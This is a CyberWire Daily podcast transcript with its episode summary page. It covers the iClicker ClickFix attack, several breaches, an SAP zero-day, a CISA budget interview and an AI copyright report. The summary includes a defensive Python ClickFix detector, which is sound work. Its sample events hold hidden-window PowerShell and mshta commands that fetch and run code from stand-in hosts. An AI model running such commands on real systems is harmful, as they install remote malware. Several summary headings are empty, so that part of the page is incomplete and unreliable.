Dave Bittner
You're listening to the CyberWire Network, powered by N2K. Hey everybody, Dave here. Join me and my guests, Outpost24's Laura Enriquez and Michaelo Steppa, on Tuesday, May 13th at noon Eastern time for a live discussion on the biggest threats hitting web applications today and what you can do about them. We're going to talk about why attackers still love web apps in 2025, the latest threat trends shaping the security landscape, how to spot and prioritize critical vulnerabilities fast, along with scalable, practical steps to strengthen your defenses. Again, the webinar is Tuesday, May 13th, for our live conversation on the state of modern web application security. You can register now by visiting events.thecyberwire.com. That's events.thecyberwire.com. We'll see you there.

Hey everybody, Dave here. I've talked about DeleteMe before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. DeleteMe keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved, knowing my privacy isn't something I have to worry about every day. The DeleteMe team handles everything. It's the set-it-and-forget-it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees' personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special deal: 20% off your DeleteMe plan. Just go to joindeleteme.com/n2k and use promo code N2K at checkout. That's joindeleteme.com/n2k, code N2K.

A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over $1.3 billion. Stores across the UK face empty shelves due to an ongoing cyber attack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. US prosecutors charged three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, senior reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA, and fair use faces limits in generative AI.

May 12, 2025. I'm Dave Bittner, and this is your CyberWire Intel Briefing. Happy Monday and thanks for joining us here today. It is great to have you with us.

iClicker is a student engagement platform used by about 5,000 instructors and 7 million students at US colleges, including major universities like Michigan and Florida. Between April 12th and the 16th of this year, its website was compromised in a ClickFix social engineering attack. A fake CAPTCHA tricked visitors into running a malicious PowerShell script by copying it from the clipboard into the Windows Run dialog. Once executed, the script connected to a remote server to fetch more malware. Depending on the visitor, the attack either gave hackers full access or downloaded harmless software to avoid detection. The likely payload was an information stealer targeting credentials, browser data and cryptocurrency wallets. iClicker confirmed the breach on May 6, stating its apps and data were unaffected and the vulnerability had been fixed. The number of affected users is still unknown.

Google will pay $1.375 billion to Texas to settle claims it secretly tracked users' locations, private browsing activity and biometric data without consent. The lawsuit, led by Attorney General Ken Paxton, alleged that Google continued tracking users even with location services off and used the data for advertising profits. It also claimed Google collected biometric data like facial geometry without proper consent. Google denies wrongdoing but has since updated its policies. The settlement is one of the largest US privacy-related fines.

Co-op stores across the UK are facing empty shelves due to an ongoing cyber attack that began two weeks ago. Fearing hackers may still have access, the company has kept key logistics systems offline, severely disrupting deliveries. Staff report depot shipments are below 20% of normal, with meat, dairy and eggs prioritized due to perishability laws. Other items like produce, canned goods and cigarettes remain scarce. CEO Shirine Khoury-Haq confirmed customer and member data was compromised, though the nature of the hack is still unclear. Despite all stores remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co-op is the only major grocer, special delivery processes are in place. Co-op, a member-owned cooperative, operates over 3,000 locations and does not have to report financial losses to public markets.

Ascension Health reported that over 437,000 patients were affected by a data breach tied to a third-party vendor's software vulnerability, not its own systems. Hackers exploited this flaw to steal sensitive data including names, contact details, Social Security numbers and health information. The breach likely stemmed from the Clop ransomware group's December 2023 attack on Cleo's file transfer platform. Impacted patients are being offered two years of free credit monitoring. This breach is smaller than Ascension's May 2024 ransomware incident affecting 5.6 million.

A critical zero-day vulnerability in SAP NetWeaver is being actively exploited by Chinese state-sponsored hackers. The flaw, found in SAP NetWeaver's Internet Communication Manager component, allows unauthenticated remote code execution via crafted HTTP requests. Despite emergency patches, many SAP systems remain exposed. Attackers are targeting high-value sectors like finance and manufacturing to steal sensitive data and establish persistent access. Researchers found that custom malware dubbed Safire uses encrypted communication over SAP protocols, making detection difficult. The attack chain begins with a malicious SOAP request that exploits memory corruption and delivers a reverse shell. From there, attackers modify SAP configurations to maintain access. The sophisticated campaign raises concerns about supply chain risks and has already caused operational disruptions across critical sectors, including healthcare, government and infrastructure.

Varonis has uncovered two major cybersecurity threats targeting IT admins and cloud systems. First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools. These fake downloads can install backdoors like SmokedHam or monitoring software, enabling credential theft and data exfiltration. In one case, nearly a terabyte of data was stolen, followed by a ransomware attack. Separately, Varonis found a critical root access flaw in Azure's AZNFS-mount utility. Used in HPC and AI workloads, the bug lets unprivileged users escalate to root by exploiting environment variables. Though Microsoft rated it low severity, the risk of full cloud compromise is significant. Varonis urges immediate patching and recommends a defense-in-depth strategy to reduce exposure.

US prosecutors have charged three Russians and one Kazakhstani in connection with the takedown of two major botnets, Anyproxy and 5socks. The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them into proxy servers for rent on the seized websites. The botnets offered over 7,000 proxies, generating $46 million over 20 years. The operation, named Moonlander, involved international cooperation and technical analysis from Lumen Technologies. Many infected routers were found in Oklahoma, with global reach across over 80 countries. The FBI warns that outdated routers, especially older Linksys, Cisco and TP-Link models, are prime targets for exploitation by threat actors, including Chinese hackers. Two defendants also face charges of using false identities to register domains. Authorities urge replacing unsupported routers to avoid similar compromises.

A new tool called Defendnot disables Microsoft Defender by exploiting the Windows Security Center (WSC) API, tricking Windows into thinking a legitimate antivirus is installed. Created by a GitHub developer, Defendnot registers a fake antivirus product using reverse-engineered interactions with the undocumented WSC API, bypassing Microsoft's integrity checks by injecting its code into trusted processes like Task Manager. Once registered, Windows automatically disables Defender to avoid conflicts. While the tool requires admin privileges and persistent installation to survive reboots, it poses a risk if abused by malware developers. Security experts warn that although Defendnot showcases impressive technical skill, it highlights a significant security gap in how Windows handles AV product registration. The tool builds on the developer's earlier project, no-defender, and underscores the need for better safeguards in WSC's architecture.

Coming up after the break, my conversation with Tim Starks from CyberScoop, discussing congressional reactions to White House budget cut proposals for CISA, and fair use faces limits in generative AI. Stick around.

And now a word from our sponsor, ThreatLocker. Keeping your system secure shouldn't mean constantly reacting to threats. ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start, without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com.

Let's be real. Navigating security compliance can feel like assembling IKEA furniture without the instructions. You know you need it, but it takes forever, and you're never quite sure if you've done it right. That's where Vanta comes in. Vanta is a trust management platform that automates up to 90% of the work for frameworks like SOC 2, ISO 27001 and HIPAA, getting you audit-ready in weeks, not months. Whether you're a founder, an engineer, or managing IT and security for the first time, Vanta helps you prove your security posture without taking over your life. More than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor compliance, streamline risk, and speed up security reviews by up to five times. And the ROI? A recent IDC report found Vanta saves businesses over half a million dollars a year and pays for itself in just three months. For a limited time, you can get $1,000 off Vanta at vanta.com/cyber. That's V-A-N-T-A dot com.

It is always my pleasure to welcome back to the show Tim Starks. He is a senior reporter at CyberScoop. Tim, welcome back.
Tim Starks
It's great to be back.
Dave Bittner
So, Tim, you have posted a couple of stories over on CyberScoop in the past week or so looking at some of the proposed cuts to CISA and reactions from lawmakers about that. Can you unpack some of your reporting here for us?
Tim Starks
Yeah, sure. We start at the tail end of what would have been May 2, I think, where the administration put out its skinny budget, as they called it, basically lacking major details. But it indicated that they would be looking to cut CISA's budget by $491 million, which is, you know, I think I estimated it was 17%. Lawmakers have been saying close to 20%. I think both are accurate, but it's a pretty massive potential cut. And the reasons they talked about doing this, you know, they don't go into a lot of details, but they talk about this notion that the Trump administration has that CISA was part of the censorship industrial complex. We can talk more about whether that's true or not in a second. But, you know, we saw some reaction from lawmakers. First on the House side, the appropriators, Democrats, were very harsh about this cut. They were basically saying this would be a killing blow for the agency, among other things. The Republican chairman of the Subcommittee on Homeland Security, Mark Amodei, had said, we need more details than this. We're hearing that China and Russia are kicking our butts, and here we are looking to cut this agency. So you need to really show us why you think we need to do that. And then it continues on into later in the week, on Thursday of this week, when it was the Senate's time to do this. And the top Democrat on the Homeland Security Appropriations Subcommittee, Chris Murphy, said that this was an illegal gutting of cybersecurity at DHS to pay for the border. And that gets us up to speed.
Dave Bittner
Well, let's go in a little reverse order then, from where you laid things out for us. Talking about Senator Murphy, what is the case that he's making that these cuts might be illegal?
Tim Starks
Yeah, he was painting with a broader brush when he was talking about the power of the purse that Congress has. I mean, the idea is Congress appropriates money, the executive branch spends it. And there have been a lot of things happening at CISA where cuts have already happened to personnel, cuts have already happened to programs. There are talks about even more cuts. You know, potentially a thousand-plus people at a 3,000-person agency. And Senator Murphy's case was, this is illegal because you're ignoring congressional mandates.
Dave Bittner
Let's talk about Kristi Noem, who has referred to CISA as playing the role of the Ministry of Truth.
Tim Starks
Yeah.
Dave Bittner
This rhetoric, I guess it feels old to me. I feel as though after the 2020 election, we had Trump himself, and of course his inner circle, saying that the election was fraudulent and all of those things, which, as we know, got played out in many, many courtrooms across the country. But my sense after all of that was that CISA was, maybe out of self-interest, backing away from the misinformation role on their own. And so it seems to me like this stuff coming from Kristi Noem is kind of a solution in search of a problem.
Tim Starks
I think that's a good characterization. Trying not to editorialize here, but the administration, the Biden administration, really backed off of anything it was doing on misinformation, disinformation, which by the way was at best a minuscule amount of the work that the agency was doing. Then the Secretary of Homeland Security herself evicted anybody who was in the election security community within CISA who was still working on misinformation or disinformation anyway, and explicitly related to election security. And that was, you know, I think the most revealing exchange, even though we led our story with Senator Murphy, was between Senator Peters and Kristi Noem, with him basically saying, okay, so you got rid of 15 people out of 3,000. How are you trying to get the agency back on mission? And she says it is back on mission. But that's contradicted by the fact that if you look at what little information there is in the Trump administration budget proposal for fiscal 2026, their major reason that they're saying that we need to cut back on this agency is that it's being this Ministry of Truth kind of thing. So it's a little confusing about whether they believe this is still going on and, if so, in what ways. I mean, there are other programs that people have singled out there that DHS has also gotten rid of. So things like monitoring, unlike extremism, DHS has cut contracts for that under this administration. So you start to wonder where the $491 million comes from, and whether, to quote Lauren Underwood, the top Democrat on the House Appropriations Subcommittee, this isn't about cutting fat, this is about deep cuts. And I think probably it's a justification you can use, especially to the right. If you're saying we need to cut the size of government overall and CISA has 3,000 people, we're going to have to cut some people there, too. That's what it kind of feels like to me, is that this is more an excuse.

But maybe, you know, maybe they'll surprise us. And when they finally do release the full budget, which appropriators don't know when that's going to happen, they said at these two sessions, maybe they'll reveal what they're cutting and we'll say, oh, that's what they were referring to. Or at least it'll make a little bit of sense. Whether you agree or disagree with their interpretation of things, you'll at least be able to point to it and say, I understand their reasoning. Right now, I don't understand, frankly.
Dave Bittner
Yeah, I mean, obviously I'm left scratching my own head. It's just that it doesn't... Clearly our adversaries are not slowing down or dialing back their investments in misinformation or their attempts to get into our systems. So it would seem to me like the mission is as important as ever.
Tim Starks
Yeah, on that front specifically, you know, if you were saying, I'm concerned about the government censoring American speech, well, they've gotten rid of State Department programs that are focused on foreign misinformation campaigns. So I don't know. You know, it still doesn't make a lot of sense, like we were talking about. Why, you know, if you're concerned about Russia and China, and, to their credit, despite the issues that this president has had with Russia and whether he's too close to it, CISA has stood by and said, we believe Russia is a cyber threat. So if you think they're threats, why would you cut these agencies? They need to do a better job, I think, than they have so far to convince me that they have a case. And that's always kind of like my baseline as a reporter. Like, do they have a case? And then you make the case in the story, you explain that case, you let the media decide. But right now, I don't hear a case. It doesn't make sense.
Dave Bittner
Well, when we look at proposed leadership for CISA, is it possible that we could find ourselves in a situation where we have a leader who shields the workers from all of this political rhetoric and just says, hey, everybody, heads down, we're going to continue our important work, we're going to make the most of the funds we have. Let me take all of the heat on all of this political stuff, but we've got work to do.
Tim Starks
I think it's possible. I think we actually saw that under the first Trump administration.
Dave Bittner
Yeah.
Tim Starks
Chris Krebs, at least until the very end, did a good job of keeping CISA off of the President's radar. And, you know, the nominee for the CISA job is Sean Plankey. He has a good reputation out there in the cyber world, left and right. He's considered a smart operator. So we'll see what he does. You know, when the time comes that he does have his hearing, what kind of things he'll say to walk this tightrope of wanting to run an agency that you believe in, but also having it cut under your feet by your own president. We'll see what he can get done. I think it's at least possible that he can mitigate some of these things. I think there was another hearing that I tuned into a little bit this week where Kash Patel, who is probably as loyalist as it gets to Trump, was saying that the FBI needed more money than the budget proposal. So if he's saying it, I wonder if somebody who's less ideologically aligned, and I don't mean to say that Sean Plankey is not conservative, because my understanding is that he is, but if somebody who's less ideologically aligned to this MAGA movement, maybe that person can find a way to walk that tightrope.
Dave Bittner
Yeah. All right. Well, we will have links to all of Tim's reporting on these topics in our show notes. Tim Starks is senior reporter at CyberScoop. Tim, thanks so much for taking the time for us.
Tim Starks
Thank you, Dave.
Dave Bittner
What's the common denominator in security incidents? Escalations and lateral movement. When a privileged account is compromised, attackers can seize control of critical assets. With bad directory hygiene and years of technical debt, identity attack paths are easy targets for threat actors to exploit, but hard for defenders to detect. This poses risk in Active Directory, Entra ID and hybrid configurations. Identity leaders are reducing such risks with attack path management. You can learn how attack path management is connecting identity and security teams while reducing risk with BloodHound Enterprise, powered by SpecterOps. Head to specterops.io today to learn more. SpecterOps: see your attack paths the way adversaries do.

And finally, late last Friday, in a move as quietly timed as it was politically charged, the US Copyright Office released a pre-publication version of part three of its AI study just hours before its top leadership was abruptly dismissed. The 108-page report tackles how copyright law, especially fair use, should apply to AI training. It argues that copying during training is presumptively infringing and that even the model's weights may embed protected expression. The report emphasizes that fair use hinges on how the AI is ultimately used, not just how it's trained. Particularly striking is the office's endorsement of a novel market dilution theory, warning that AI-generated content could flood and devalue markets even without direct copying. While courts are not bound by the report, its detailed reasoning could shape the over 40 ongoing copyright cases involving generative AI. Whether the report survives changing political winds remains uncertain, but its legal implications are already rippling outward.

And that's the CyberWire. For links to all of today's stories, check out our daily briefing at thecyberwire.com. Don't forget to check out the Grumpy Old Geeks podcast, where I contribute to a regular segment on Jason and Brian's show every week. You can find Grumpy Old Geeks where all the fine podcasts are listed. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2k.com. N2K's senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We're mixed by Trey Hester, with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow.

And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. SpyCloud's holistic Identity Threat Protection helps security teams uncover and automatically remediate hidden exposures across your users, from breaches, malware and phishing, to neutralize identity-based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report at spycloud.com/cyberwire and see what attackers already know. That's spycloud.com/cyberwire.
CyberWire Daily: No Quick Fix for a ClickFix Attack
Release Date: May 12, 2025
In this episode of CyberWire Daily, host Dave Bittner discusses the latest cybersecurity threats and incidents impacting various sectors. The episode delves into a sophisticated social engineering attack on the iClicker platform, significant privacy settlements involving Google, widespread cyberattacks affecting retail chains in the UK, and critical vulnerabilities exploited by state-sponsored hackers. Additionally, the episode features an in-depth interview with Tim Starks, a senior reporter from CyberScoop, who sheds light on proposed budget cuts to the Cybersecurity and Infrastructure Security Agency (CISA) and the political dynamics surrounding them.
Between April 12th and 16th, 2025, the student engagement platform iClicker, utilized by approximately 5,000 instructors and 7 million students across major US universities like Michigan and Florida, fell victim to a sophisticated ClickFix social engineering attack. The attack involved a fake CAPTCHA that deceived users into pasting and executing a malicious PowerShell script through the Windows Run dialog. This script, once run, connected to a remote server to download additional malware, which either granted hackers full access or installed benign software to evade detection. The likely payload was an information stealer targeting credentials, browser data, and cryptocurrency wallets.
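The ClickFix chain described above leaves a recognisable footprint in endpoint telemetry: a script interpreter spawned by explorer.exe (the parent of anything launched from the Win+R Run dialog), usually with a hidden window and a command line that fetches and evaluates remote content. The following detector is an added example, not code from the podcast, iClicker or any vendor; it scores constructed Sysmon ProcessCreate-style records (field names follow Sysmon's Event ID 1, the sample events and hostnames are invented) and flags those that combine an explorer.exe parent with ClickFix-typical arguments.

```python
"""Heuristic detector for ClickFix-style interpreter launches.

Added example, not from the page. Input is JSON-lines with Sysmon
ProcessCreate field names (Image, ParentImage, CommandLine, ProcessId).
The SAMPLE_LINES below are constructed, not real telemetry.
"""
import json
import re

# Interpreters a pasted Run-dialog command typically ends up in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Argument patterns that recur in ClickFix payloads; each hit adds one point.
SUSPICIOUS_ARGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b"
        r"|mshta\s+https?:|msiexec\s+/i\s+https?:", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}


def _basename(path):
    """Return the final component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def score_record(rec):
    """Return (score, indicators) for one ProcessCreate record."""
    if _basename(rec.get("Image", "")) not in INTERPRETERS:
        return 0, []
    score, indicators = 0, []
    # Run-dialog launches show explorer.exe as the parent; weight it higher
    # than any single argument because admins rarely launch scripts that way.
    if _basename(rec.get("ParentImage", "")) == "explorer.exe":
        score += 2
        indicators.append("parent_explorer")
    cmd = rec.get("CommandLine", "")
    for name, pattern in SUSPICIOUS_ARGS.items():
        if pattern.search(cmd):
            score += 1
            indicators.append(name)
    return score, indicators


def analyze(lines, threshold=3):
    """Parse JSON-lines telemetry and return alerts at or above threshold."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        score, indicators = score_record(rec)
        if score >= threshold:
            alerts.append({"ProcessId": rec.get("ProcessId"), "score": score,
                           "indicators": indicators,
                           "CommandLine": rec.get("CommandLine", "")})
    return alerts


# Constructed sample events: one benign scheduled script, one ClickFix-style
# PowerShell launch, one mshta launch from the Run dialog, one unrelated app.
SAMPLE_LINES = [json.dumps(r) for r in [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 5312, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://verify.example.invalid/check.ps1')\""},
    {"ProcessId": 6008, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta http://captcha.example.invalid/verify.hta"},
    {"ProcessId": 6120, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
]]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES):
        print(alert["ProcessId"], alert["score"], alert["indicators"])
```

The parent-process weighting is the part worth keeping even if the argument patterns are tuned per environment: a one-off admin running PowerShell from cmd.exe scores zero here, while the same interpreter launched from explorer.exe with a remote fetch crosses the threshold. On a real host the pasted command is also recorded in the user's RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which is a useful corroborating artifact during triage.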
Google is set to pay $1.375 billion to the state of Texas to resolve allegations that it secretly tracked users’ locations, private browsing activities, and biometric data without consent. The lawsuit, spearheaded by Attorney General Ken Paxton, claims that Google continued tracking users even with location services disabled and utilized collected data for advertising revenue. Additionally, it is alleged that Google amassed biometric data, such as facial geometry, without proper consent.
Co-Op, a major retail cooperative in the UK with over 3,000 locations, is grappling with severe operational disruptions due to a prolonged cyberattack that began two weeks prior to the episode's release. The attack has led to empty shelves as key logistics systems remain offline, hindering deliveries.
Ascension Health reported a data breach affecting over 437,000 patients due to a vulnerability in a third-party vendor's software, not its own systems. Hackers exploited this flaw to steal sensitive information, including names, contact details, Social Security numbers, and health data. The breach is linked to the Clop ransomware group's December 2023 attack on Cleo's file transfer platform.
A critical zero-day vulnerability in SAP NetWeaver's Internet Communication Manager has been actively exploited by Chinese state-sponsored hackers. The flaw allows unauthenticated remote code execution via crafted HTTP requests.
Varonis has identified two significant cybersecurity threats targeting IT administrators and cloud systems:
SEO Poisoning for Malware Delivery:
Critical Root Access Flaw in Azure's AZNFS-mount Utility:
US prosecutors have charged three Russians and one Kazakhstani in relation to the dismantling of two major botnets, Anyproxy and 5socks. These botnets were the target of an operation named Moonlander; the suspects allegedly converted outdated wireless routers into proxy servers available for rent on the seized websites, offering over 7,000 proxies and generating approximately $46 million over two decades.
A newly developed tool named Defendnot has emerged, which disables Microsoft Defender by exploiting the Windows Security Center (WSC) API. Created by a GitHub developer, Defendnot tricks Windows into recognizing a fake antivirus product as legitimate, thereby prompting the automatic disabling of Defender to avoid conflicts.
Tim Starks, a senior reporter from CyberScoop, provides an in-depth analysis of the proposed $491 million budget cut to CISA, representing approximately 17-20% of its funding. This potential reduction has sparked significant controversy among lawmakers and cybersecurity experts.
Budget Proposal Context:
Legislative Reactions:
Administration’s Justification:
CISA’s Current Status:
Leadership and Future Outlook:
Strategic Implications:
Notable Quotes:
Dave Bittner highlights that the common denominator in security incidents is the escalation and lateral movement within networks. Compromised privileged accounts can lead to attackers seizing control of critical assets, especially in environments with poor directory hygiene and extensive technical debt. Identity attack paths, particularly in Active Directory, Entra ID, and hybrid configurations, remain attractive targets for threat actors due to their exploitability and the difficulty defenders face in detecting such breaches.
The US Copyright Office released a pre-publication version of part three of its AI study, coinciding with the abrupt dismissal of its top leadership. The 108-page report examines how copyright law, particularly fair use, should apply to AI training processes.
Key Findings:
Legal Implications: While courts are not bound by the report, its detailed reasoning is expected to influence over 40 ongoing copyright cases involving generative AI. The report’s future impact remains uncertain due to shifting political landscapes, but its legal arguments are already influencing broader discussions.
This episode of CyberWire Daily underscores the evolving and multifaceted nature of cybersecurity threats in 2025. From sophisticated social engineering attacks on educational platforms to significant privacy settlements and state-sponsored exploits, the landscape remains perilous. The in-depth interview with Tim Starks highlights the precarious position of CISA amidst political maneuvering, emphasizing the need for sustained investment in cybersecurity infrastructure. Additionally, emerging tools like Defendnot and comprehensive studies on AI's legal implications underscore the continuous arms race between threat actors and defenders. Staying informed and proactive is imperative for both organizations and individuals to navigate the complex cybersecurity terrain effectively.
Notable Quotes with Timestamps:
Stay Informed: For more insights and daily briefings, subscribe to CyberWire Daily and ensure you’re equipped with the knowledge to stay ahead in the ever-changing cybersecurity landscape.